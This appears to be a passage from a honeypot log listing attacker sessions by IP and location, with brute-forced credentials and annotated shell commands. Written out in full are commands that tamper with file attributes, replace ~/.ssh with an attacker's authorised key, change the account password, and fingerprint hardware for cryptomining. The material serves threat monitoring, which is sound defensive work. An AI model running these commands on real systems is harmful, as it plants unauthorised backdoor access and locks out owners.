$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ nocturnal_sensei_sol (20.153.204.5) โ€” Tokyo, Japan ยท 1 session ยท 2 cmds
2026-07-05 04:21 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ silent_drifter_sol (186.64.123.124) โ€” Curicรณ, Chile ยท 1 session ยท 2 cmds
2026-07-05 04:20 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ savage_acai_sol (14.102.230.4) โ€” Sรฃo Paulo, Brazil ยท 1 session ยท 2 cmds
2026-07-05 04:20 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ silent_bamboo_sol_231 (103.186.101.231) โ€” Quแบญn Mแป™t, Vietnam ยท 1 session ยท 2 cmds
2026-07-05 04:20 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ ashen_lotus_sol (112.137.143.2) โ€” Hanoi, Vietnam ยท 1 session ยท 2 cmds
2026-07-05 04:19 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ haywire_dragonfruit_sol (113.177.27.200) โ€” Hanoi, Vietnam ยท 1 session ยท 2 cmds
2026-07-05 04:19 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sneaky_mate_sol (181.104.2.65) โ€” Buenos Aires, Argentina ยท 1 session ยท 20 cmds
2026-07-05 04:18 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "1234qwer\nRSM2u7C28X20\nRSM2u7C28X20"|passwd|bash
$ Enter new UNIX password:
$ echo "1234qwer\nRSM2u7C28X20\nRSM2u7C28X20\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ haywire_spice_root (168.144.95.137) โ€” Bengaluru, India ยท 1 session ยท 2 cmds
2026-07-05 04:17 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sullen_specter_root (103.59.163.135) โ€” Yangon, Myanmar ยท 1 session ยท 2 cmds
2026-07-05 04:17 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ haywire_tulip_sol (45.148.10.240) โ€” Amsterdam, The Netherlands ยท 720 sessions ยท 720 cmds
2026-06-13 06:21 EDT ยท as bitcoin/bitcoin, eth/eth, firedancer/firedancer
Ran uname 900x across 900 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—720
โ†ณ obfuscated system check
๐ŸŽญ rogue_saffron_root (31.14.116.163) โ€” Tehran, Iran ยท 32 sessions ยท 32 cmds
2026-07-04 20:15 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ placid_ghost_root_227 (195.178.110.227) โ€” Andorra la Vella, Andorra ยท 42 sessions ยท 338 cmds
2026-06-25 08:10 EDT ยท as admin/123456, admin/admin, admin/admin123
PATH manipulation โ†’ OS fingerprinting via uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS release check via /etc/os-release โ†’ uptime capture โ†’ hardware profiling for cryptomining potential
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—7
$ uname -s -v -n -m 2 > /dev/null ร—42
$ /bin/uname -s -v -n -m 2 > /dev/null ร—34
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—34
$ busybox uname -s -v -n -m 2 > /dev/null ร—34
$ ( [ -f /proc/version ] ร—34
$ [ -f /proc/version ] ร—34
$ head -1 /proc/version | cut -d -f1 ร—34
$ [ -f /etc/os-release ] ร—34
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; echo; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; echo; cat /proc/device-tree/model 2>/dev/null; echo; lscpu 2>/dev/null | grep "Model name" | cut -d: -f2-; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—14
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—12
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—8
$ uname -m 2 > /dev/null ร—8
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—8
๐ŸŽญ stoic_panda_root_168 (106.12.61.168) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-07-04 21:23 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ manic_tulip_sol (45.153.34.15) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-07-04 19:21 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ silent_bike_root (193.32.162.84) โ€” Amsterdam, The Netherlands ยท 19 sessions ยท 171 cmds
2026-07-02 14:23 EDT ยท as admin/123456, admin/admin, admin/admin123
PATH manipulation via export โ†’ kernel fingerprinting with uname -s -v -n -m โ†’ OS version extraction from /proc/version โ†’ Linux distribution detection via /etc/os-release โ†’ hardware architecture enumeration โ†’ silent reconnaissance without payload deployment.
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—14
$ uname -s -v -n -m 2 > /dev/null ร—19
$ /bin/uname -s -v -n -m 2 > /dev/null ร—19
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—19
$ busybox uname -s -v -n -m 2 > /dev/null ร—19
$ ( [ -f /proc/version ] ร—19
$ [ -f /proc/version ] ร—19
$ head -1 /proc/version | cut -d -f1 ร—19
$ [ -f /etc/os-release ] ร—19
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep 